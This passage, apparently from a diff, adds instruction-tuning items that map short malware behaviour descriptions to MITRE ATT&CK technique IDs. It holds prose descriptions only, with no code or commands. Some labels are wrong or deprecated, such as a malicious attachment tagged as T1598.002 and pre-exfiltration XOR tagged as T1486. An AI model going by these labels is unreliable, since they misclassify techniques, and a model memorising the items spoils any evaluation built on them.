adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Some variants use HTTP for C2.", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Some versions of have used the hard-coded string \u201cthis is the encrypt key\u201d for Blowfish encryption when communicating with a C2. Later versions have hard-coded keys uniquely for each C2 address.", + "output": "- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "spearphished victims via Facebook and Whatsapp.", + "output": "- T1566.003: Phishing - Spearphishing via Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "stages data prior to exfiltration in multi-part archives, often saved in the Recycle Bin.", + "output": "- T1074: Data Staged" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "steals credentials from compromised hosts. 's credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by include ones associated with The Bat!, Yahoo!, Mail.ru, Passport.Net, Google Talk, Netscape Navigator, Mozilla Firefox, Mozilla Thunderbird, Internet Explorer, Microsoft Outlook, WinInet Credential Cache, and Lightweight Directory Access Protocol (LDAP).", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "steals credentials from its victims.", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "steals credentials stored in Web browsers by querying the sqlite database and leveraging the Windows Vault mechanism.", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The \"\"tDiscoverer\"\" variant of establishes a C2 channel by downloading resources from Web services like Twitter and GitHub. binaries contain an algorithm that generates a different Twitter handle for the malware to check for instructions every day.\"", + "output": "- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The \"\"Uploader\"\" variant of visits a hard-coded server over HTTP/S to download the images uses to receive commands.\"", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The \"\"ZR\"\" variant of will check to see if known host-based firewalls are installed on the infected systems. will attempt to establish a C2 channel, then will examine open windows to identify a pop-up from the firewall software and will simulate a mouse-click to allow the connection to proceed.\"", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The C2 channel uses HTTP POST requests.", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The client has been signed by fake and invalid digital certificates.", + "output": "- T1553.002: Subvert Trust Controls - Code Signing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The component KillDisk is capable of deleting Windows Event Logs.", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The crimeware toolkit has refined its detection of sandbox analysis environments by inspecting the process list and Registry.", + "output": "- T1518.001: Software Discovery - Security Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The discovery modules used with can collect information on accounts and permissions.", + "output": "- T1087: Account Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The file name AcroRD32.exe, a legitimate process name for Adobe's Acrobat Reader, was used by as a name for malware.", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The group has used other forms of obfuscation, include commingling legitimate traffic with communications traffic so that network streams appear legitimate. Some malware that has been used by also uses steganography to hide communication in PNG image files.", + "output": "- T1001: Data Obfuscation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware communicates to its command server using HTTP with an encrypted payload.", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"To establish persistence, adds a Registry Run key with a value \"\"TaskMgr\"\" in an attempt to masquerade as the legitimate Windows Task Manager.\"", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To establish persistence, identifies the Start Menu Startup directory and drops a link to its own executable disguised as an \u201cOffice Start,\u201d \u201cYahoo Talk,\u201d \u201cMSN Gaming Z0ne,\u201d or \u201cMSN Talk\u201d shortcut.", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- T1036: Masquerading\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "transferred compressed and encrypted RAR files containing exfiltration through the established backdoor command and control channel during operations.", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "transfers files from the compromised host via HTTP or HTTPS to a C2 server.", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TRINITY malware used by identifies payment card track data on the victim and then copies it to a local file in a subdirectory of C:\\Windows\\. Once the malware collects the data, actors compressed data and moved it to another staging system before exfiltration.", + "output": "- T1074: Data Staged" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "used a cron job for persistence on Mac devices.", + "output": "- T1053: Scheduled Task/Job" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "used publicly available tools (including Microsoft's built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS.", + "output": "- T1018: Remote System Discovery\n- T1046: Network Service Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "used spearphishing emails with malicious Microsoft Word attachments to infect victims.", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "used the Plink command-line utility to create SSH tunnels to C2 servers.", + "output": "- T1573: Encrypted Channel\n- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "used the PowerShell filenames Office365DCOMCheck.ps1 and SystemDiskClean.ps1.", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "used to download payloads, run a reverse shell, and execute malware on the victim's machine.", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "used to launch an authentication window for users to enter their credentials.", + "output": "- T1187: Forced Authentication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "used VBS and JavaScript scripts to help perform tasks on the victim's machine.", + "output": "- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "uses 's malleable C2 functionality to blend in with network traffic.", + "output": "- T1095: Non-Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "uses a batch file that configures the ComSysApp service to autostart in order to establish persistence.", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "uses a batch file to kill a security program task and then attempts to remove itself.", + "output": "- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "uses a copy of tor2web proxy for HTTPS communications.", + "output": "- T1090.003: Proxy - Multi-hop Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "uses a custom binary protocol to beacon back to its C2 server. It has also used XOR for encrypting communications.", + "output": "- T1095: Non-Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "uses a custom command and control protocol that communicates over commonly used ports, and is frequently encapsulated by application layer protocols.", + "output": "- T1071: Application Layer Protocol\n- T1043: Commonly Used Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "uses a custom command and control protocol that communicates over commonly used ports. The C2 protocol is encapsulated in common application layer protocols.", + "output": "- T1043: Commonly Used Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "uses a hidden directory named .calisto to store data from the victim\u2019s machine before exfiltration.", + "output": "- T1564.001: Hide Artifacts - Hidden Files and Directories\n- T1074: Data Staged" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "uses a module to execute Mimikatz with PowerShell to perform .", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "uses AppleScript to create a login item for persistence.", + "output": "- T1059.002: Command and Scripting Interpreter - AppleScript" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "uses a tool to infect connected USB devices and transmit itself to air-gapped computers when the infected USB device is inserted.", + "output": "- T1091: Replication Through Removable Media" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "uses a variation of the XOR cipher to encrypt files before exfiltration.", + "output": "- T1486: Data Encrypted for Impact" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "uses command line for execution.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "uses FakeTLS to communicate with its C2 server.", + "output": "- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "uses HTTP TCP port 80 and HTTPS TCP port 443 for communications.", + "output": "- T1043: Commonly Used Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "uses RDP to tunnel traffic from a victim environment.", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "uses reg add to add a Registry Run key for persistence.", + "output": "- T1112: Modify Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"uses services.exe to register a new autostart service named \"\"Audit Service\"\" using a copy of the local lsass.exe file.\"", + "output": "- T1543.003: Create or Modify System Process - Windows Service\n- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "uses the command line and rundll32.exe to execute.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "uses the Skype API to record audio and video calls. It writes encrypted data to %APPDATA%\\Intel\\Skype.", + "output": "- T1125: Video Capture\n- T1123: Audio Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. 